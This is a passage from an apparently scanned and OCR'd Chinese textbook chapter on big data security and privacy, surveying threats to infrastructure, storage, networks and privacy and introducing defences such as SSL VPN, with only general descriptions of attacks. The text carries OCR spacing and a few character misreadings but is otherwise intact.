大 数据 的 产生 使 企业 数据 更 加 复杂 且 难 以 管理 。 据 统计 ,全 球 在 过 去 5 年 中 产生 的 
数据 量 要 比 以 往 400 年 产生 的 数据 量 加 起 来 还 要 多 ,这 些 数据 包括 文档 、 图 片 ,视频 、Web 
页 面 . 电 子 邮 件 、 微 博 等 不 同 的 数据 类 型 ,这 其 中 只 有 20% 是 结构 化 数据 ,其 余 80% 都 是 
非 结构 化 数据 。 企 业 如 果 要 利用 这 些 数据 必须 花费 大 量 的 时 间 与 金钱 ,而 面 对 这 样 庞大 
的 数据 ,如 何 保障 其 安全 也 是 一 项 极 具 挑战 性 的 任务 。 
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数据 的 不 断 增多 使 得 数据 安全 和 隐私 保护 问题 日 益 突出 ,各 种 安全 事件 给 企业 和 组 
织 敲 响 了 警钟 。 在 整个 数据 的 生命 周期 里 ,企业 需要 遵守 比 以 往 更 严格 的 合 规 标准 和 保 
密 规 定 ; 随 着 数据 存储 和 分 析 使 用 的 安全 性 和 隐私 保护 要 求 越 来 越 高 ,传统 的 数据 保护 方法 
常常 无 法 满足 需求 ;网 络 和 数字 化 生活 使 得 黑客 更 容易 获得 他 人 的 相关 信息 ,有 了 更 多 不 易 
被 追踪 和 防范 的 犯罪 手段 。 因 此 ,大 数据 应 用 中 数据 安全 和 隐私 保护 是 一 个 重要 的 问题 。 

隐私 是 指 当事人 不 愿意 被 他 人 知道 或 他 人 不 便 知 道 的 敏感 信息 , 它 与 公共 利益 、 群 体 
利益 无 关 , 具 有 隐藏 特性 。 安 全 是 指 不 受 威胁 ,没有 和 危险、 危害 或 损失 。 信 息 安全 是 指 采 
取 技 术 和 管理 的 安全 保护 手段 ,保护 软 硬 件 与 数据 不 因 偶然 的 或 恶意 的 原因 而 遭 到 破坏 、 
更 改 或 泄露 。 

在 大 数据 时 代 ,传统 的 隐私 数据 内 涵 与 外 延 有 了 巨大 的 突破 与 延伸 ,隐私 数据 保护 不 
力 所 造 成 的 恐慌 已 不 能 由 个 人 或 团体 承受 ,隐私 数据 保护 技术 面临 更 多 的 挑战 。 大 数据 
时 代 下 的 隐私 数据 保护 与 安全 体系 除 涉及 技术 ,管理 外 ,还 涉及 国家 安全 与 国际 秩序 。 隐 
私 数据 泄露 影响 的 波及 面 很 可 能 会 突破 个 人 、 团 体 或 地 区 的 限制 ,发 展 到 全 球 性 的 影响 。 

从 本 质 上 来 说 ,大 数据 的 安全 与 隐私 问题 就 是 我 们 要 能 够 在 大 数据 时 代 兼 顾 安全 与 
自由 ,个 性 化 服务 与 商业 利益 、 国 家 安全 与 个 人 隐私 的 基础 上 ,从 数据 中 挖掘 其 潜在 的 巨 
大 商业 价值 和 学 术 价值 ,并 使 其 研究 成 果真 正 地 服务 于 社会 。 

在 大 数据 时 代 , 随 着 我 们 对 大 数据 的 进一步 认识 和 研究 ,呈现 出 的 安全 隐私 威胁 主要 
有 以 下 几 个 方面 : 

1. 大 数据 基础 设施 安全 威胁 

大 数据 基础 设施 包括 存储 设备 .计算 设备 一体 机 和 其 他 基础 软件 (如 虚拟 化 软件 ) 
等 。 为 了 支持 大 数据 的 应 用 ,需要 创建 支持 大 数据 环境 的 基础 设施 。 例 如 ,需要 高 速 的 网 
络 来 收集 各 种 数据 源 , 大 规模 的 存储 设备 对 海量 数据 进行 存储 ,还 需要 各 种 服务 器 和 计算 
设备 对 数据 进行 分 析 与 应 用 ,并 且 这 些 基 础 设施 带 有 虚拟 化 和 分 布 式 性 质 等 特点 。 这 些 
基础 设施 给 用 户 带 来 各 种 大 数据 新 应 用 的 同时 ,也 会 遭受 到 安全 威胁 。 

(1) 非 授权 访问 。 没 有 预先 经 过 同意 ,就 使 用 网 络 或 计算 机 资源 。 例 如 ,有 意 避 开 系 
统 访问 控制 机 制 ,对 网 络 设备 及 资源 进行 非 正常 访问 使 用 ,或 擅自 扩大 使 用 权限 ,越权 访 
问 信 息 。 由 于 在 基础 设施 层 ,大 量 的 数据 (包括 大 量 的 企业 运营 数据 、 客 户 信 息 、 个 人 的 隐 
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私 和 各 种 行为 的 细节 记录 ) 汇 集 , 使 得 这 些 数 据 进行 集中 存储 ,但 是 集中 存储 的 同时 ,也 增 
加 了 数据 泄露 的 风险 ,而 这 些 数 据 不 被 越权 访问 ,也 成 为 保护 大 数据 安全 的 重要 的 一 部 
分 。 非 授权 访问 的 主要 形式 有 假冒 .身份 攻击 ,非法 用 户 进 入 网 络 系统 进行 违法 操作 ,以 
及 合法 用 户 以 未 授权 方式 进行 操作 等 。 

(2) 信息 泄露 或 丢失 。 数 据 在 传输 过 程 中 泄露 或 丢失 (例如 利用 电磁 泄漏 或 搭 线 监 
听 的 方式 截获 机 密 信 息 ,或 通过 对 信息 流向 流量 .通信 频 度 和 长 度 等 参数 分 析 ,窃取 有 用 
信息 等 ) ,在 存储 介质 中 丢失 或 泄露 ,以 及 “黑客 ”通过 建立 隐蔽 隧道 窃取 敏感 信息 等 。 

(3) 网 络 基础 设施 传输 过 程 中 破坏 数据 完整 性 。 大 数据 采用 的 分 布 式 和 虚拟 化 架 
构 , 意 味 着 比 传统 的 基础 设施 有 更 多 的 数据 传输 ,大 量 数 据 在 一 个 共享 的 系统 里 被 集成 和 
复制 , 当 加 密 强 度 不 够 的 数据 在 传输 时 ,攻击 者 能 通过 实施 嗅 探 、 中 间 人 攻击 、 重 放 攻 击 来 
窃取 或 算 改 数据 。 

(4) 拒绝 服务 攻击 。 通 过 对 网 络 服务 系统 的 不 断 干扰 ,改变 其 正常 的 作业 流程 或 执 
行 无 关 程 序 , 导 致 系统 响应 迟缓 ,影响 合法 用 户 的 正常 使 用 ,甚至 使 合法 用 户 遭 到 排斥 ,不 
能 得 到 相应 的 服务 。 

(5) 网 络 病毒 传播 , 即 通过 信息 网 络 传播 计算 机 病毒 。 针 对 虚拟 化 技术 的 安全 漏洞 
攻击 ,黑客 可 利用 虚拟 机 管理 系统 自身 的 漏洞 ,入 侵 到 宿主 主机 或 同 个 宿主 机 上 的 其 他 虚 
拟 机 。 

2. 大 数据 存储 安全 威胁 

大 数据 规模 的 爆发 性 增长 ,对 存储 架构 产生 新 的 需求 ,大 数据 分 析 应 用 需求 也 在 推动 
着 IT 技术 以 及 云 计 算 技术 的 发 展 。 大 数据 的 规模 通常 可 达到 PB 量 级 ,结构 化 数据 和 非 
结构 化 数据 混杂 其 中 ,数据 的 来 源 多 种 多 样 ,传统 的 结构 化 存储 系统 已 经 无 法 满足 大 数据 
应 用 的 需要 ,因此 ,需要 采用 面向 大 数据 处 理 的 存储 系统 架构 。 大 数据 存储 系统 要 有 强大 
的 扩展 能 力 , 可 以 通过 增加 模块 或 磁盘 存储 来 增加 容量 ;大 数据 存储 系统 的 扩展 要 操作 简 
单 快 速 ,扩展 操作 甚至 不 需要 停机 。 在 此 种 背景 下 , Scale-out 架构 越 来 越 受 到 青睐 。 
Scale-out 是 指 根据 需求 增加 不 同 的 服务 器 和 存储 应 用 ,依靠 多 部 服务 器 存储 协同 计算 、 
负载 平衡 及 容错 等 功能 来 提高 运算 能 力 及 可 靠 度 。 与 传统 的 存储 系统 架构 完全 不 同 ， 
Scale-out 架构 可 以 实现 无 颖 平滑 地 扩展 ,避免 产生 * 存 储 孤 岛 "。 

在 传统 的 数据 安全 中 ,数据 存储 是 非法 入 侵 的 最 后 环节 ,目前 已 形成 完善 的 安全 防护 
体系 。 大 数据 对 存储 的 需求 主要 体现 在 海量 数据 处 理 、 大 规模 集群 管理 、 低 延迟 读 写 速度 
和 较 低 的 建设 及 运营 成 本 方面 。 大 数据 时 代 的 数据 非常 繁杂 ,来 自 于 生活 、 学 术 、 商 业 等 
各 个 方面 ,而 且 其 数据 量 非常 的 惊人 ,其 数据 之 间 的 彼此 相关 性 也 使 得 保证 这 些 信息 数 据 
在 有 效 利用 之 前 的 安全 是 一 个 重要 的 话题 。 在 数据 应 用 的 生命 周期 中 ,数据 存储 是 一 个 
关键 环节 ,数据 停留 在 此 阶段 的 时 间 最 长 。 目 前 ,可 采用 关系 型 (SQL) 数 据 库 和 非 关系 型 
(NoSQL) 数 据 库 进行 存储 。 现 阶段 ,大 多 数 的 企业 主要 采用 非 关系 型 数据 库存 储 大 
数据 。 

1) 关系 型 数据 库存 储 安全 

关系 型 分 布 式 数据 的 理论 技术 是 ACID( 原 子 性 (atomicity) ,一致 性 (consistency) 、 隔 
离 性 (isolation) 持久 性 (durability) ) 模 型 。 事 务 的 原子 性 是 指 事务 中 包含 的 所 有 操作 要 
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么 全 做 ,要 么 全 不 做 。 一 致 性 是 指 在 事务 开始 之 前 ,数据 库 处 于 一 致 性 的 状态 ,事务 结束 
后 ,数据 库 也 必须 处 于 一 致 性 状态 。 事 务 隔 离 性 要 求 系统 必须 保证 事务 不 受 其 他 并 发 执 
行 的 事务 影响 。 例 如 对 于 任何 一 对 事务 Tl 和 T2 ,在 事务 Tl 看 来 ,T2 要 么 在 Tl 开始 之 
前 已 经 结束 ,要 么 在 Tl 完成 之 后 才 开 始 执行 。 而 持久 性 是 指 一 个 事务 一 旦 成 功 完 成 , 它 
对 数据 库 的 改变 必须 是 永久 的 ,即便 是 在 系统 遇 到 故障 的 情况 下 也 不 会 丢失 。 数 据 的 重 
要 性 决定 了 事务 持久 性 的 重要 性 。 

通过 SQL 数据 库 的 ACID 模型 可 以 知道 ,传统 的 关系 型 数据 库 虽 然 因为 通用 性 设计 
带 来 了 性 能 上 的 限制 ,但 可 以 通过 集群 提供 较 强 的 横向 扩展 能 力 。 关 系 型 数据 库 的 优点 
除了 较 强 的 并 发 读 写 能 力 ,数据 强 一 致 性 保障 ,很 强 的 结构 化 查询 与 复杂 分 析 能 力 和 标准 
的 数据 访问 接口 外 ,还 有 操作 方便 、 易 于 维护 、 便 于 访问 、 安 全 便捷 等 优点 。 

通常 ,数据 结构 化 对 于 数据 库 开 发 和 数据 防护 有 着 非常 重要 的 作用 。 结 构 化 的 数据 
便于 管理 ,加密 、 处 理 和 分 类 ,能 够 有 效 地 智能 分 辨 非法 入 侵 数 据 , 数 据 结 构 化 虽然 不 能 够 
彻底 避免 数据 安全 风险 ,但 是 能 够 加 快 数据 安全 防护 的 效果 。 

关系 型 数据 库 所 具有 的 ACID 特性 保证 了 数据 库 交 易 的 可 靠 处 理 。 关 系 型 数据 库 通 
过 集成 的 安全 功能 保证 了 数据 的 机 密 性 、 完 整 性 和 可 用 性 ,例如 基于 角色 的 权限 控制 、. 数 
据 加 密 机 制 支持 行 和 列 的 访问 控制 等 。 

但 是 ,关系 型 数据 库 也 存在 很 多 瓶颈 ,包括 不 能 有 效 地 处 理 多 维 数据 ,不 能 有 效 处 理 
半 结 构 化 和 非 结 构 化 的 海量 数据 ,高 并 发 读 写 性 能 低 ,支撑 容量 有 限 , 数 据 库 的 可 扩展 性 
和 可 用 性 低 , 建 设 和 运 维 成 本 高 等 。 

2) 非 关系 型 数据 库存 储 安全 

由 于 大 数据 具备 数据 量 大 、 多 数据 类 型 增长 速度 快 和 价值 密度 低 的 特点 ,采用 传统 
关系 型 数据 库 管理 技术 往往 面临 成 本 支出 过 多 扩展 性 差 ,数据 快速 查询 困难 等 问题 。 对 
于 占 数 据 总 量 80% 以 上 的 非 结构 化 数据 ,通常 采用 NoSQL 技术 完成 对 大 数据 的 存储 、 管 
理 和 处 理 。NoSQL 指 的 是 非 关 系 型 数据 库 , 包 含 大 量 不 同类 型 结构 化 数据 和 非 结构 化 数 
据 的 数据 存储 。 和 关系 型 分 布 式 数 据 库 的 ACID 理论 基础 相对 , 非 关 系 型 数据 库 的 理论 
基础 是 BASE 模型 。BASE 来 自 于 互联 网 电子 商务 领域 的 实践 , 它 是 基于 CAP 理论 逐步 
演化 而 来 ,核心 思想 是 即便 不 能 达到 强 一 致 性 (Strong Consistency), 但 可 以 根据 应 用 特 
点 采用 适当 的 方式 来 达到 最 终 一 致 性 (Eventual consistency) 的 效果 。BASE 是 basically 
available、soft state、eventually consistent 等 3 个 词组 的 简写 ,是 对 CAP 中 CA 应 用 的 延 
伸 。BASE 的 含义 包括 : 基本 可 用 (basically available) ; 软 状态 /柔性 事务 (soft state) , 即 
状态 可 以 有 一 段 时 间 的 不 同步 ;最 终 一 致 性 (eventual consistency)。BASE 是 反 ACID 
的 , 它 完全 不 同 于 ACID 模型 ,牺牲 强 一 致 性 ,获得 基本 可 用 性 和 柔性 可 靠 性 性 能 ,并 要 求 
达到 最 终 一 致 性 。 

从 NoSQL 的 理论 基础 可 以 知道 ,由 于 数据 多 样 性 , 非 关 系 型 数据 并 不 是 通过 标准 的 
SQL 请 言 进行 访问 的 。NoSQL 数据 存储 方法 的 主要 优点 是 数据 的 可 扩展 性 和 可 用 性 、 
数据 存储 的 灵活 性 。 每 个 数据 的 镜像 都 存储 在 不 同 地 点 以 确保 数据 可 用 性 。NoSQL 的 
不 足 之 处 在 数据 一 致 性 方面 需要 应 用 层 保 障 , 结 构 化 查询 统计 能 力也 较 弱 。 

NoSQL 数据 库存 储 带 来 如 下 安全 挑战 : 
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(1) 模式 成 熟 度 不 够 。 目 前 的 标准 SQL 技术 包括 严格 的 访问 控制 和 隐私 管理 工具 ， 
而 在 NoSQL 模式 中 ,并 没有 这 样 的 要 求 。 事实 上 ,NoSQL 无 法 沿用 SQL 的 模式 , 它 应 
该 有 自己 的 新 模式 。 例 如 ,与 传统 SQL 数据 存储 相 比 ,在 NoSQL 数据 存储 中 , 列 和 行 级 
的 安全 性 更 为 重要 。 此 外 ,NoSQL 允许 不 断 对 数据 记录 添加 属性 ,需要 为 这 些 新 属性 定 
义 安全 策略 。 

(2) 系统 成 熟 度 不 够 。 在 饱 受 各 种 安全 问题 的 困扰 后 ,关系 型 数据 库 和 文件 服务 器 
系统 的 安全 机 制 已 经 变 得 比较 成 熟 。 虽 然 NoSQL 可 以 从 关系 型 数据 库 安 全 设计 中 学 习 
经 验 教训 ,但 至 少 在 几 年 内 NoSQL 仍然 会 存在 各 种 漏洞 。 

(3) 客户 端 软件 问题 。 由 于 NoSQL 服务 器 软件 没有 内 置 足够 的 安全 机 制 ,因此 , 必 
须 对 访问 这 些 软 件 的 客户 端 应 用 程序 提供 安全 措施 ,这 样 又 会 产生 其 他 问题 ,如 身份 验证 
和 授权 功能 .SQL 注入 问题 .代码 容易 产生 漏洞 .数据 元 余 和 分 散 性 问题 等 。 

3. 大 数据 网 络 安全 威胁 

互联 网 及 移动 互联 网 的 快速 发 展 不 断 地 改变 人 们 的 工作 、 生 活 方式 ,同时 也 带 来 严重 
的 安全 威胁 。 网 络 面临 的 风险 可 分 为 广度 风险 和 深度 风险 。 广 度 风险 是 指 安全 问题 随 网 
络 结 点 数量 的 增加 呈 指 数 级 上 升 。 深 度 风 险 是 指 传统 攻击 依然 存在 且 手 段 多 样 : APT 
(高 级 持续 性 威胁 ) 攻 击 逐 渐 增 多 且 造 成 的 损失 不 断 增 大 ;攻击 者 的 工具 和 手段 呈现 平台 
化 、 集 成 化 和 自动 化 的 特点 ,具有 更 强 的 隐蔽 性 、 更 长 的 攻击 与 潜伏 时 间 、 更 加 明确 和 特定 
的 攻击 目标 。 结 合 广度 风险 与 深度 风险 。 大 规模 网 络 主要 面临 的 问题 包括 : 安全 数据 规 
模 巨 大 、 安 全 事件 难以 发 现 、 安 全 的 整体 状况 无 法 描述 、 安 全 态势 难以 感知 等 。 

通过 上 述 分 析 , 网 络 安全 是 大 数据 安全 防护 的 重要 内 容 。 现 有 的 安全 机 制 对 大 数据 
环境 下 的 网 络 安全 防护 并 不 完美 。 一 方面 ,大 数据 时 代 的 信息 爆炸 ,导致 来 自 网 络 的 非法 
入 侵 次 数 急剧 增长 ,网络 防御 形式 十 分 严峻 。 另 一 方面 ,由 于 攻击 技术 的 不 断 成 熟 ,现在 
的 网 络 攻击 手段 越 来 越 难以 辨识 ,给 现 有 的 数据 防护 机 制 带 来 了 巨大 的 压力 。 因 此 对 于 
大 型 网 络 ,在 网 络 安全 层面 ,除了 访问 控制 ,人 侵 检测 .身份 识 别 等 基础 防御 手段 ,还 需要 
管理 人 员 能 够 及 时 感知 网 络 中 的 异常 事件 与 整体 安全 态势 ,从 成 千 上 万 的 安全 事件 和 日 
志 中 找到 最 有 价值 .最 需要 处 理 和 解决 的 安全 问题 ,从 而 保障 网 络 的 安全 状态 。 

4. 大 数据 隐私 泄漏 安全 威胁 

大 数据 通常 包含 了 大 量 的 用 户 身份 信息 、 属 性 信息 、 行 为 信息 ,在 大 数据 应 用 的 各 个 
阶段 内 ,如 果 不 能 保护 好 大 数据 , 极 易 造成 用 户 隐私 泄漏 。 此 外 ,大 数据 的 多 源 性 ,使 得 来 
自 各 个 渠道 的 数据 可 以 用 来 进行 交叉 检验 。 过 去 ,一 些 拥 有 数据 的 企业 经 常 提供 经 过 简 
单 匿 名 化 的 数据 作为 公开 的 测试 集 , 在 大 数据 环境 下 ,多 源 交叉 验证 有 可 能 发 现 匿名 化 数 
据 后 面 的 真实 用 户 ,同样 会 导致 隐私 泄漏 。 

隐私 泄漏 成 为 大 数据 必须 要 面 对 且 急需 解决 的 问题 。 大 数据 时 代 , 现 有 的 隐私 保护 
技术 手段 还 不 够 完善 ,除了 要 建立 健全 个 人 隐私 保护 的 法 律 法 规 和 基本 规则 之 外 ,还 应 鼓 
励 隐私 保护 技术 的 研发 .创新 和 使 用 ,从 技术 层面 来 保障 隐私 安全 ,完善 用 户 保障 体系 。 

传统 数据 安全 往往 是 围绕 数据 生命 周期 来 部 署 的 , 即 数据 的 产生 、 存 储 、 使 用 和 销毁 。 
随 着 大 数据 应 用 越 来 越 多 ,数据 的 拥有 者 和 管理 者 相 分 离 ,原来 的 数据 生命 周期 逐渐 转变 
成 数据 的 产生 、 传 输 、 存 储 和 使 用 。 由 于 大 数据 的 规模 没有 上 限 , 且 许多 数据 的 生命 周期 
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极为 短暂 ,因此 ,常规 安全 产品 要 想 继续 发 挥 作 用 , 则 需要 解决 如 何 根据 数据 存储 和 处 理 
的 动态 化 ,并行 化 特征 ,动态 跟踪 数据 边界 ,管理 对 数据 的 操作 行为 等 。 

大 数据 中 的 隐私 泄露 主要 有 以 下 表现 形式 : 

(1) 在 数据 存储 的 过 程 中 对 用 户 隐私 权 造 成 的 侵犯 。 大 数据 中 用 户 无 法 知道 数据 确 
切 的 存放 位 置 ,用 户 对 其 个 人 数据 的 采集 、 存 储 、 使 用 、 分 享 无 法 有 效 控制 。 

(2) 在 数据 传输 的 过 程 中 对 用 户 隐私 权 造 成 的 侵犯 。 大 数据 环境 下 数据 传输 将 更 为 
开放 和 多 元 化 ,传统 物理 区 域 隔离 的 方法 无 法 有 效 保证 远 距 离 传输 的 安全 性 ,电磁 泄漏 和 
窃听 将 成 为 更 加 突出 的 安全 威胁 。 

(3) 在 数据 处 理 的 过 程 中 对 用 户 隐私 权 造 成 的 侵犯 。 大 数据 环境 下 可 能 部 署 大 量 的 
虚拟 技术 ,基础 设施 的 脆弱 性 和 加 密 措施 的 失效 可 能 产生 新 的 安全 风险 。 大 规模 的 数据 
处 理 需要 完备 的 访问 控制 和 身份 认证 管理 ,以 避免 未 经 授权 的 数据 访问 ,但 资源 动态 共享 
的 模式 无 疑 增加 了 这 种 管理 的 难度 ,账户 劫持 攻击、 身份 伪装 ,认证 失败 、 密 钥 丢 失 等 都 
可 能 威胁 用 户 数据 安全 。 

5. 其 他 安全 威胁 

大 数据 除了 在 基础 设施 存储、 网 络 、 隐 私 等 方面 面临 上 述 安全 威胁 外 ,还 包括 如 下 几 
个 方面 。 

(1) 网 络 化 社会 使 大 数据 易 成 为 攻击 的 目标 。 论 坛 博客 、 微 博 、 社 交 网 络 、 视 频 网 站 
为 代表 的 新 媒体 形式 促成 网 络 社会 的 形成 ,在 网 络 化 社会 中 ,信息 的 价值 要 超过 基础 设施 
的 价值 , 极 易 吸引 黑客 的 攻击 。 另 一 方面 ,网 络 化 社会 中 大 数据 蕴藏 着 人 与 人 之 间 的 关系 
与 联系 ,使 得 黑客 成 功 攻击 一 次 就 能 获得 大 量 数据 ,无 形 中 降低 了 黑客 的 进攻 成 本 ,增加 
了 攻击 收益 。 近 年 来 在 互联 网 上 发 生 用 户 账号 的 信息 失窃 等 连锁 反应 可 以 看 出 ,大 数据 
更 容易 吸引 黑客 ,而 且 一 旦 遭受 攻击 ,造成 损失 十 分 惊人 。 

(2) 大 数据 滥用 风险 。 计 算 机 网 络 技术 和 人 工 智能 的 发 展 ,为 大 数据 自动 收集 以 及 
智能 动态 分 析 提 供 方便 。 但 是 ,大 数据 技术 被 滥用 或 者 误 用 也 会 带 来 安全 风险 。 一 方面 ， 
大 数据 本 身 的 安全 防护 存在 漏洞 。 对 大 数据 的 安全 控制 力度 仍然 不 够 ,API 访问 权限 控 
制 以 及 密 钥 生成 ,存储 和 管理 方面 的 不 足 都 可 能 造成 数据 泄露 。 另 一 方面 ,攻击 者 也 在 利 
用 大 数据 技术 进行 攻击 。 例 如 ,黑客 能 够 利用 大 数据 技术 最 大 限度 地 收集 更 多 用 户 敏感 
信息 。 

(3) 大 数据 误 用 风险 。 大 数据 的 准确 性 、 数 据 质 量 以 及 使 用 大 数据 做 出 的 决定 可 能 
会 产生 影响 ,例如 ,从 社交 媒体 获取 个 人 信息 的 准确 性 ,基本 的 个 人 资料 例如 年 龄 .婚姻 状 
况 .教育 或 者 就 业 情况 等 通常 都 是 未 经 验证 的 ,分 析 结 果 可 信和 度 不 高 。 另 一 个 是 数据 的 质 
量 , 从 公众 渠道 收集 到 的 信息 ,可 能 与 需求 相关 度 较 小 。 这 些 数据 的 价值 密度 较 低 , 如 果 
对 其 进行 分 析 和 使 用 可 能 产生 无 效 的 结果 ,从 而 导致 错误 的 决策 。 
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大 数据 安全 与 隐私 保护 技术 可 以 从 两 个 方向 进行 研究 : 一 是 确保 大 数据 安全 的 关 
键 技术 ,涉及 大 数据 业务 链条 上 的 数据 产生 、 存 储 、 处 理 、 价 值 提取 、 商 业 应 用 等 环节 的 
数据 安全 防御 和 保护 技术 ;二 是 利用 涉及 安全 信息 的 大 数据 在 信息 安全 领域 进行 分 析 
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与 应 用 ,涉及 安全 大 数据 的 收集 、 整 理 . 过滤、 整合 存储、 挖掘 .审计 、 应 用 等 环节 的 关 
键 技术 。 

大 数据 安全 保障 技术 可 以 从 物理 安全 .系统 安全 、 网 络 安全 、 存 储 安 全 \ 访 问安 全、 审 
计 安 全 .运营 安全 等 角度 进行 考虑 ,围绕 大 数据 全 生命 周期 , 即 数据 产生 、 采 集 、 传 输 、 存 
储 、 处 理 、 分析、 发 布展 示 和 应 用 .产生 新 数据 等 阶段 进行 安全 防护 。 其 目标 在 于 : 最 大 
程度 的 保护 具有 流动 性 和 开放 性 特征 的 大 数据 自身 安全 ,防止 数据 泄露 .越权 访问 、 数 据 
算 改 ,数据 丢失 、 密 钥 泄 露 \ 侵 犯 用 户 隐私 等 问题 的 出 现 。 因 此 ,大 数据 安全 保障 技术 需要 
设计 和 构建 更 多 的 技术 标准 、 安 全 规范 .工具 产品 .安全 服务 等 形式 来 保护 大 数据 的 安全 。 

根据 大 数据 特点 及 应 用 需求 的 特点 ,将 数据 的 生命 周期 进行 合并 与 精简 ,可 以 将 大 数 
据 的 应 用 过 程 划分 为 采集 存储、 挖掘 ,发 布 4 个 环节 。 数 据 采 集 环节 是 指数 据 的 采集 与 
汇聚 ,安全 问题 主要 是 数据 汇集 过 程 中 的 传输 安全 问题 ;数据 存储 环节 是 指数 据 汇聚 完毕 
后 大 数据 的 存储 ,需要 保证 数据 的 机 密 性 和 可 用 性 ,提供 隐私 保护 ;数据 挖掘 是 指 从 海量 
数据 中 抽取 出 有 用 信息 的 过 程 , 需 要 认证 挖掘 者 的 身份 .严格 控制 挖掘 的 操作 权限 ,防止 
机 密 信 息 的 泄露 ;数据 发 布 是 指 将 有 用 信息 输出 给 应 用 系统 ,需要 进行 安全 审计 ,并 保证 
可 以 对 可 能 的 机 密 泄 露 进行 数据 溯源 。 

1. 数据 采集 安全 技术 

海量 大 数据 的 存储 需求 催生 了 大 规模 分 布 式 采集 及 存储 模式 。 在 数据 采集 过 程 中 ， 
可 能 存在 数据 损坏 数据 丢失 ,数据 泄露 数据 窃取 等 安全 威胁 ,因此 需要 使 用 身份 认证 、 
数据 加 密 、 完 整 性 保护 等 安全 机 制 来 保证 采集 过 程 的 安全 性 。 下 面 将 首先 讨论 数据 采集 
过 程 中 传输 安全 的 要 求 , 然 后 再 简单 介绍 一 下 虚拟 专用 网 技术 ,并 重点 介绍 SSL VPN 技 
术 在 大 数据 传输 过 程 中 的 应 用 。 

一 般 来 说 ,数据 传输 的 安全 要 求 有 机 密 性 、 完 整 性 真实 性 和 防止 重 放 攻击 等 。 要 达 
到 上 述 安全 要 求 ,一 般 采 用 的 技术 手段 : 目的 端 认 证 源 端 的 身份 ,确保 数据 的 真实 性 ; 数 
据 加 密 以 满足 数据 机 密 性 要 求 ; 密 文 数据 后 附加 MAC( 消 息 认证 码 ) ,以 达到 数据 完整 性 
保护 的 目的 ;数据 分 组 中 加 入 时 间 戳 或 不 可 重复 的 标示 来 保证 数据 抵抗 重 放 攻击 的 能 
力 等 。 

一 般 地 ,要 实现 数据 的 安全 传输 ,可 采用 虚拟 专用 网 VPN 技术 。 该 技术 将 隧道 技 
术 ,协议 封装 技术 、 密 码 技术 和 配置 管理 技术 结合 在 一 起 ,采用 安全 通道 技术 在 源 端 和 目 
的 端 建立 安全 的 数据 通道 ,通过 将 待 传输 的 原始 数据 进行 加 密 和 协议 封装 处 理 后 再 嵌 套 
装 人 另 一 种 协议 的 数据 报 文 中 , 像 普 通 数据 报 文 一 样 在 网 络 中 进行 传输 。 经 过 这 样 的 处 
理 , 只 有 源 端 和 目的 端的 用 户 对 通道 中 的 嵌 套 信息 能 够 进行 解释 和 处 理 , 而 对 于 其 他 用 户 
而 言 只 是 无 意义 的 信息 。 

目前 较为 成 熟 的 VPN 实用 技术 均 有 相应 的 协议 规范 和 配置 管理 方法 。 这 些 常 用 配 
置 方法 和 协议 主要 包括 路 由 过 滤 技 术 、 通 用 路 由 封装 协议 (GRE)、 第 二 层 转 发 协议 
(L2F) ,第 二 层 隧道 协议 (L2TP) 、IP 安全 协议 (IPSec)、SSL 协议 等 。 多 年 来 ,IPSec 协议 
一 直 被 认为 是 构建 VPN 最 好 的 选择 ,从 理论 上 讲 IPSec 协议 提供 了 网 络 层 之 上 所 有 协议 
的 安全 。 然 而 ,由 于 IPSec 协议 的 复杂 性 ,使 其 很 难 满足 构建 VPN 要 求 的 灵活 性 和 可 扩 
展 性 。 


第 3 章 “信息 安全 新 技术 及 应 用 \@@ 人 


SSL VPN 凭借 其 简单 .灵活 、 安 全 的 特点 ,得 到 了 迅速 的 发 展 ,尤其 在 大 数据 环境 下 
的 远程 接 入 访问 应 用 方面 ,SSL VPN 具有 明显 的 优势 。SSL VPN 采用 标准 的 安全 套 接 
层 协议 ,基于 X. 509 证 书 ,支持 多 种 加 密 算 法 。 可 以 提供 基于 应 用 层 的 访问 控制 ,具有 数 
据 加 密 、 完 整 性 检测 和 认证 机 制 ,而 且 客 户 端 无 须 特定 软件 的 安装 ,更 加 容易 配置 和 管理 
等 特点 ,从 而 降低 用 户 的 总 成 本 增加 远程 用 户 的 工作 效率 。 

在 大 数据 环境 下 的 数据 应 用 和 挖掘 ,需要 以 海量 数据 的 采集 与 汇聚 为 基础 ,采用 SSL 
VPN 技术 可 以 保证 数据 在 结 点 之 间 传 输 的 安全 性 。 以 电信 运营 商 的 大 数据 应 用 为 例 , 运 
营 商 的 大 数据 平台 一 般 采 用 多 级 架构 ,处 于 不 同 地理 位 置 的 结 点 之 间 需 要 传输 数据 ,在 任 
意 传输 结 点 之 间 均 可 部 署 SSL VPN ,保证 端 到 端的 数据 安全 传输 。 安 全 机 制 的 配置 意味 
着 额外 的 开销 ,引入 传输 保护 机 制 后 ,除了 数据 安全 性 之 外 ,对 数据 传输 效率 的 影响 主要 
有 两 个 方面 : 一 是 加 密 与 解密 对 数据 速率 造成 的 影响 ;二 是 加 密 与 解密 对 于 主机 性 能 造 
成 的 影响 。 在 实际 应 用 中 ,选择 加 解密 算法 和 认证 方法 时 ,需要 在 计算 开销 和 效率 之 间 进 
行 权衡 。 

2. 数据 存储 安全 技术 

大 数据 的 关键 在 于 数据 分 析 和 利用 ,因此 不 可 避免 增加 了 数据 存储 的 安全 风险 。 相 
对 于 传统 的 数据 ,大 数据 还 具有 生命 周期 长 ,多 次 访问 、 频 繁 使 用 的 特征 ,大 数据 环境 下 ， 
云 服 务 商 数据 合作 厂商 的 引入 增加 了 用 户 隐 私 数据 泄露 .企业 机 密 数 据 泄露 .数据 被 窃 
取 的 风险 ;另外 由 于 大 数据 具有 如 此 高 的 价值 ,大 量 的 黑客 就 会 设法 窃取 平台 中 存储 的 大 
数据 ,以 谋取 利益 ,大 数据 的 泄露 将 会 对 企业 和 用 户 造成 无 法 估量 的 后 果 , 如 果 数 据 存储 
的 安全 性 得 不 到 保证 ,将 会 极 大 地 限制 大 数据 的 应 用 与 发 展 。 

接 下 来 将 阐述 大 数据 存储 安全 的 几 项 关键 技术 ,包括 隐私 保护 、 数 据 加 密 、 备 份 与 恢 
复 等 。 

1) 隐私 保护 

简单 地 说 ,隐私 就 是 个 人 、 机 构 等 实体 不 愿意 被 外 部 世界 知晓 的 信息 。 在 具体 数据 应 
用 中 ,隐私 即 为 数据 所 有 者 不 愿意 被 披露 的 敏感 信息 ,包括 敏感 数据 以 及 数据 所 表征 的 特 
性 ,如 用 户 的 手机 号 、 固 定 电 话 、 位 置信 息 等 。 但 当 针对 不 同 的 数据 以 及 数据 所 有 者 时 , 隐 
